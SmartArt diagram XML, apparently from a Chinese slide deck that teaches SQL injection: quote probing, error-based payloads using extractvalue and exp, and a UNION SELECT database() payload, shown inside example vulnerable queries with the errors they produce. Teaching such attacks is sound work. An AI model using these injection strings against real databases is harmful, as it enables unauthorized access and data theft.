    <dgm:cxn modelId="{F411D850-9376-47ED-B352-D816746A5B86}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{33750691-16C4-4D1C-B07B-13032B59B2E4}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{9E061137-81B2-4ECE-AB25-522714A6B5C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0A834B21-1FEC-40A9-85E8-840865BCF208}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{CA41862D-8759-499E-BE04-DD513795BC59}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A7FA9D6A-9C36-40A1-9A6B-3259C5FA9936}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{82A84D0B-04AC-4DCD-8A5F-5B1A4728DD8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D3D5A5BA-A019-40E1-BD12-32BB7CB37B8A}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{B83C724A-CF05-48A2-B88E-B62004C737FA}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{9A873427-AA01-44DD-8578-C351508D91D8}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2DD2A9C4-2AA5-4E82-B646-1A29E83488B3}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FDDC9E00-19C7-4546-B627-C59745F626D3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{20CF7446-0F7F-4B0E-9AAF-2DD35C489D6F}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{AE39F4B6-5BC5-479F-AF1F-2511216AC897}" type="presParOf" srcId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" destId="{8CC709BE-1E60-493D-8CA9-144586666C58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{1E9F8AB5-5B9F-47BE-A3E5-EAEC0B2960FA}" type="presParOf" srcId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" destId="{48931127-ABD4-4DD2-B984-08D0D8CD79F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{10286602-6179-4505-83CC-17ADD0AA7188}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FCB81395-D76A-4474-BDCE-1B43B75CFBFB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{BCE7BB19-40AD-4448-8488-38E65D8C5782}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FEE02288-FAD6-4366-965F-58F7404B784A}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0CC835FE-0AAC-4597-BF1F-719DFCFDBDEE}" type="presParOf" srcId="{FEE02288-FAD6-4366-965F-58F7404B784A}" destId="{F92447D1-0983-437A-961F-5D47637340EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{32638391-EB48-4B51-860B-EB23AE42495F}" type="presParOf" srcId="{FEE02288-FAD6-4366-965F-58F7404B784A}" destId="{D4C8E0A9-44B0-448F-BA09-3D3A3CD37C08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{75F4C3C3-E05D-47B0-B5FB-58AFAA462AFD}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{756A3D41-D02A-44B0-B2D3-28E34F0BFEBE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F96CA278-37F5-4A4B-9C71-5B49B6628BF1}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7E388051-D14D-42B4-8DC7-26174836EF4C}" type="presParOf" srcId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" destId="{33A651F8-FC14-4BFE-9C72-CEF93A74B212}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{54BFD458-03F9-48A4-923D-F238E20C399C}" type="presParOf" srcId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" destId="{AC571F17-C613-4440-9AE3-3B7CC47777E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5992CA-B3DF-44EC-A684-6CDD4E45CF7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433D7B-7388-4C88-AECD-3DC9C4401736}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            <a:t>尝试：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>’</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{019BDFFE-F8F8-410E-9011-EA727419B227}" type="parTrans" cxnId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}" type="sibTrans" cxnId="{B0162FF7-2BA7-45E3-9DA3-A7204923C9CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            <a:t>报错注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>1’ and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>extractvalue</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>(1,concat(0x7e,SELECT database())) #</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1ABBF6E1-347D-424A-8B82-6FA5517BB2D8}" type="parTrans" cxnId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63A1B2A4-2F74-499F-8361-18AE7F97E265}" type="sibTrans" cxnId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
            <a:t>联合注入：</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>1’ AND ‘1’=‘0’ UNION SELECT database()#</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E144439F-A4E0-4E18-A5EA-36A2BE4796D1}" type="parTrans" cxnId="{A1AB606B-888F-4E06-A93C-337887F5A304}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5508F560-28C9-4D6D-B00B-037DC89E39AC}" type="sibTrans" cxnId="{A1AB606B-888F-4E06-A93C-337887F5A304}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Select * from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> = </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FF0000"/>
              </a:highlight>
            </a:rPr>
            <a:t>‘’’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B6589AC-C765-4E63-9793-FF8149612CD5}" type="parTrans" cxnId="{7AB57964-B198-4561-B3FB-41417582F9AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{960071B1-A897-4EBF-981F-31562AE2D4DA}" type="sibTrans" cxnId="{7AB57964-B198-4561-B3FB-41417582F9AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E69D144-CF12-4B6D-94DF-1FD0FC4DB507}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:rPr>
            <a:t>DOUBLE value is out of range in ‘ exp(~’database’) ’a’))’</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DD748BD-919D-4B09-B999-3C3FA6A79C56}" type="parTrans" cxnId="{2F3BD891-CF94-41CC-95E4-58879459041D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A637320-3189-47D7-81D7-5BBF73C4E65F}" type="sibTrans" cxnId="{2F3BD891-CF94-41CC-95E4-58879459041D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7EAE1D7C-11D4-45C2-896C-3310E97722BE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Select * from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>1’ AND ‘1’=‘0’ UNION SELECT database(); </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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rPr>
            <a:t>- -</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>’;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7422D2FE-C985-4A00-A0D7-1BC2209E57DE}" type="parTrans" cxnId="{99FBD893-CBFF-404E-8C59-9844DBC331FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1845F9EF-1C06-4F4A-BEFD-CB202F2D3472}" type="sibTrans" cxnId="{99FBD893-CBFF-404E-8C59-9844DBC331FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32BAAF43-D739-4A06-8F51-BC80EB9DD95D}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:rPr>
            <a:t>REROR: …</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0CF6619-F2BC-497A-857C-312D0E6DDDD5}" type="parTrans" cxnId="{8794077B-63B2-4611-AF34-2F9369596313}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EE54C1B4-8E63-42EA-B26B-2F2DD11C3409}" type="sibTrans" cxnId="{8794077B-63B2-4611-AF34-2F9369596313}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{845BEE7F-C30A-4807-8113-AFD768431EB3}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t>Select * from </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_table</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> where </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
            <a:t>xx_name</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0"/>
            <a:t> = ‘</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:rPr>
            <a:t>1’ and exp(~(select database() a)) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US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rPr>
            <a:t>-- </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>’ ;</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7F39C35F-AC06-4D4C-85DC-94DA6B8066C7}" type="parTrans" cxnId="{ACD13479-13F6-41D4-930F-65EEA273B954}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E0B04A7-A2A6-48C7-92A0-5DC72E6DD064}" type="sibTrans" cxnId="{ACD13479-13F6-41D4-930F-65EEA273B954}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B4B7111-3827-4C20-8111-DF43A1C984D1}" type="pres">
      <dgm:prSet presAssocID="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2311097E-9541-4DD9-9C6F-1467D4A4D336}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C48136C9-B32E-4E52-921F-7A779C220BD9}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="25600" custScaleY="56665" custLinFactNeighborX="-15222" custLinFactNeighborY="-18394">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A7D765E3-B8DD-4747-B79D-3D55DDA321EA}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3F01DD4A-65B2-426B-A5EB-BD5AD2320919}" type="pres">
      <dgm:prSet presAssocID="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E3202350-DD34-4F55-85D6-66FA8C9DE5EE}" type="pres">
      <dgm:prSet presAssocID="{90DD54A5-F99D-4D54-A035-E9E75FDE8B75}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4B5B70B0-BD3B-450F-86BD-12C2BDC046A6}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{566BE809-0ABF-4AB8-A38B-277829C1B9B0}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="124978" custScaleY="65978">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{19734135-C95F-44EE-8B3F-79EA0AD53E9B}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F0218530-B9FC-4066-AB22-BF201C936E58}" type="pres">
      <dgm:prSet presAssocID="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" presName="childText" presStyleLbl="conFgAcc1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{39B3ABB2-EE4F-4B1F-8766-73A9EF5B32EE}" type="pres">
      <dgm:prSet presAssocID="{63A1B2A4-2F74-499F-8361-18AE7F97E265}" presName="spaceBetweenRectangles" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{841112B9-AFB9-4528-8C9A-A446514A3998}" type="pres">
      <dgm:prSet presAssocID="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" presName="parentLin" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9E00459B-0F43-4CCE-9BF3-672E611C0917}" type="pres">
      <dgm:prSet presAssocID="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" presName="parentLeftMargin" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6CCE2C0B-A46D-490C-9430-D4BED0BBABE7}" type="pres">
      <dgm:prSet presAssocID="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="126428" custScaleY="65978">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44853D7C-B84F-42FE-AA79-2130239F50DC}" type="pres">
      <dgm:prSet presAssocID="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" presName="negativeSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{070E4AEE-6867-49A9-84D8-25BCE1040EFF}" type="pres">
      <dgm:prSet presAssocID="{42DD0FA6-E0E6-4FC6-976D-B1B7E18917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44F002-2153-40F4-BA8B-D16B8A947E85}" type="presOf" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{C600AF1F-E3F4-4A51-9598-948EDA7B3D53}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{AD40C50F-1E02-4ABC-BF13-63C9A04E940E}" type="presOf" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{66A43B76-41C9-4C64-B654-24B186F9CF0E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{CF93AA41-97FF-4784-84C0-636F76B9DFB5}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" srcOrd="1" destOrd="0" parTransId="{1ABBF6E1-347D-424A-8B82-6FA5517BB2D8}" sibTransId="{63A1B2A4-2F74-499F-8361-18AE7F97E265}"/>
    <dgm:cxn modelId="{19158F43-4782-4F68-90EB-3010C26BD465}" type="presOf" srcId="{845BEE7F-C30A-4807-8113-AFD768431EB3}" destId="{F0218530-B9FC-4066-AB22-BF201C936E58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{7AB57964-B198-4561-B3FB-41417582F9AD}" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{DF7E1589-FAFB-4F0E-9B4B-659156ABCD9C}" srcOrd="0" destOrd="0" parTransId="{4B6589AC-C765-4E63-9793-FF8149612CD5}" sibTransId="{960071B1-A897-4EBF-981F-31562AE2D4DA}"/>
    <dgm:cxn modelId="{A7ADBC69-EB13-4BE3-99DD-62F6D250E475}" type="presOf" srcId="{1E69D144-CF12-4B6D-94DF-1FD0FC4DB507}" destId="{F0218530-B9FC-4066-AB22-BF201C936E58}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{A1AB606B-888F-4E06-A93C-337887F5A304}" srcId="{F95992CA-B3DF-44EC-A684-6CDD4E45CF71}" destId="{42DD0FA6-E0E6-4FC6-976D-B1B7E1891785}" srcOrd="2" destOrd="0" parTransId="{E144439F-A4E0-4E18-A5EA-36A2BE4796D1}" sibTransId="{5508F560-28C9-4D6D-B00B-037DC89E39AC}"/>
    <dgm:cxn modelId="{ACD13479-13F6-41D4-930F-65EEA273B954}" srcId="{F84E2699-DABD-47C9-B12F-1B437E2F5FA1}" destId="{845BEE7F-C30A-4807-8113-AFD768431EB3}" srcOrd="0" destOrd="0" parTransId="{7F39C35F-AC06-4D4C-85DC-94DA6B8066C7}" sibTransId="{5E0B04A7-A2A6-48C7-92A0-5DC72E6DD064}"/>
    <dgm:cxn modelId="{9F6ACC79-154F-4B27-9155-B273FC56EEA2}" type="presOf" srcId="{7EAE1D7C-11D4-45C2-896C-3310E97722BE}" destId="{070E4AEE-6867-49A9-84D8-25BCE1040EFF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/list1"/>
    <dgm:cxn modelId="{8794077B-63B2-4611-AF34-2F9369596313}" srcId="{D1433D7B-7388-4C88-AECD-3DC9C4401736}" destId="{32BAAF43-D739-4A06-8F51-BC80EB9DD95D}" srcOrd="1" destOrd="0" parTransId="{E0CF6619-F2BC-497A-857C-312D0E6DDDD5}" sibTransId="{EE54C1B4-8E63-42EA-B26B-2F2DD11C3409}"/>
